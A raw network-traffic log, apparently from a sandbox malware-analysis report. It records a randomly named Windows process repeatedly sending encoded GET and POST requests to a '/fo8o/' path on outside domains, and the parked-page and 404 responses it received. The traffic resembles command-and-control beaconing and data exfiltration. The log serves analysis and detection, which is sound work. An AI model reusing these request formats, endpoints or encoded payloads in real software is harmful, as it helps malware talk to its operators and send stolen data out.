Jan 11, 2025 04:08:02.995493889 CET	517	OUT	GET /fo8o/?7Fp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:08:03.688684940 CET	1236	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 03:08:03 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RftFYdjgH8YAXmpzj6gRH3RIrjTruGvh7fMV1KoEYIZIwjzck0qIkBwtnUM9VdqjUL4v8dbZDcw8VmkXcz60kw== last-modified: Sat, 11 Jan 2025 03:08:03 GMT x-cache-miss-from: parking-7df97dc48-tvmd7 server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 52 66 74 46 59 64 6a 67 48 38 59 41 58 6d 70 7a 6a 36 67 52 48 33 52 49 72 6a 54 72 75 47 76 68 37 66 4d 56 31 4b 6f 45 59 49 5a 49 77 6a 7a 63 6b 30 71 49 6b 42 77 74 6e 55 4d 39 56 64 71 6a 55 4c 34 76 38 64 62 5a 44 63 77 38 56 6d 6b 58 63 7a 36 30 6b 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RftFYdjgH8YAXmpzj6gRH3RIrjTruGvh7fMV1KoEYIZIwjzck0qIkBwtnUM9VdqjUL4v8dbZDcw8VmkXcz60kw==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Jan 11, 2025 04:08:03.688704014 CET	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi1062ng for!"><link rel="icon" type="image/png" href="//img.
Jan 11, 2025 04:08:03.688715935 CET	1236	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
Jan 11, 2025 04:08:03.688736916 CET	1236	IN	Data Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
Jan 11, 2025 04:08:03.688747883 CET	896	IN	Data Raw: 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c Data Ascii: in-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet
Jan 11, 2025 04:08:03.688759089 CET	1236	IN	Data Raw: 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 Data Ascii: lement-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.weba
Jan 11, 2025 04:08:03.688889980 CET	1236	IN	Data Raw: 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63 6f 6e 74 61 69 6e Data Ascii: nt-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:10px}.c
Jan 11, 2025 04:08:03.688901901 CET	1236	IN	Data Raw: 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 Data Ascii: -interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margi
Jan 11, 2025 04:08:03.688915014 CET	672	IN	Data Raw: 74 6e 2d 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c Data Ascii: tn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#21883
Jan 11, 2025 04:08:03.689012051 CET	1236	IN	Data Raw: 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 Data Ascii: over{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top
Jan 11, 2025 04:08:03.693767071 CET	1236	IN	Data Raw: 75 6c 74 46 6c 61 67 22 3a 66 61 6c 73 65 2c 22 70 75 22 3a 22 2f 2f 77 77 77 2e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61 6c 73 65 2c 22 74 6f 53 65 6c 6c 22 3a 66 61 6c 73 Data Ascii: ultFlag":false,"pu":"//www.rssnewscast.com","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49723	66.29.149.46	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:16.902034044 CET	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 38 6e 51 5a 53 52 75 43 52 4d 53 61 68 49 73 7a 47 4e 79 79 56 42 6f 30 43 49 6a 72 37 53 73 59 6e 36 30 39 74 77 3d Data Ascii: 7Fp=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI8nQZSRuCRMSahIszGNyyVBo0CIjr7SsYn609tw=
Jan 11, 2025 04:08:17.495199919 CET	637	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:17 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49724	66.29.149.46	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:19.432456970 CET	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 44 30 42 67 56 75 4d 50 45 43 45 71 45 6a 36 6c 52 47 34 69 32 55 37 65 5a 33 6f 75 58 2f 52 73 2b 46 6d 46 4e Data Ascii: 7Fp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpD0BgVuMPECEqEj6lRG4i2U7eZ3ouX/Rs+FmFN
Jan 11, 2025 04:08:20.045742989 CET	637	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:19 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49725	66.29.149.46	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:21.965121984 CET	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 56 4d 79 77 42 4d 2f 6e 74 50 61 42 6b 57 73 67 36 6c 52 57 39 61 68 53 39 48 52 2f 70 76 2f 71 46 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4a 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f [TRUNCATED] Data Ascii: 7Fp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1yVMywBM/ntPaBkWsg6lRW9ahS9HR/pv/qFYxCS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MJLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpujvRh4ZoEGHiegByUvb1M5qwhQSDlRkp0e8S8VpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNeNQtzD3qWuxSTmhP3rLqvAXgwdN9w/Tb2N80mcSLMi1Yr1hmzkZxo7kTH/DuDHPROmGg//8IkAbpDdAmV7HCf6T9siapFA6q/EEOeeLtU4qr27rYFjeh5udexbT30M9Oimqu12VsUlyr+ANXUFZ306OFN/h6IdECQKyBtB3n5iMmORDGiQ3CgrxsPAORyXyVMr33le3eV8xPwPxIsS289K7/Bt2El+zKwYkfPbJJGFJQu1NtynXxeE38+yGvFI59eiItItg8Q3g9hopAWVmVppI9IPgiQbe3CTGqsUpjc8/VdGOxW4z4ELoRubrBT8xnNTOa2hRwdJ0mTqyzwNzv6a6/l3pXdnu4EG5Z9M4yoaZ86GyF6WCGMePiAJfN1SnZJpqse5i7fSn/dSPgdjPlEcPbUzIC4zvUw6i5djlpNQMLfwIJ4PDxFBB6uEjMmVNiN74MJLmIbpcqPUqgLxY0uOFKUZZXUBBOnQEetVKAjAtPjqjkSEPXD7P/o/HxsFG1gN1ks4EJETWPxSBYW [TRUNCATED]
Jan 11, 2025 04:08:22.566730022 CET	637	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:22 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49726	66.29.149.46	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:08:24.498035908 CET	517	OUT	GET /fo8o/?7Fp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:08:25.100174904 CET	652	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:08:24 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 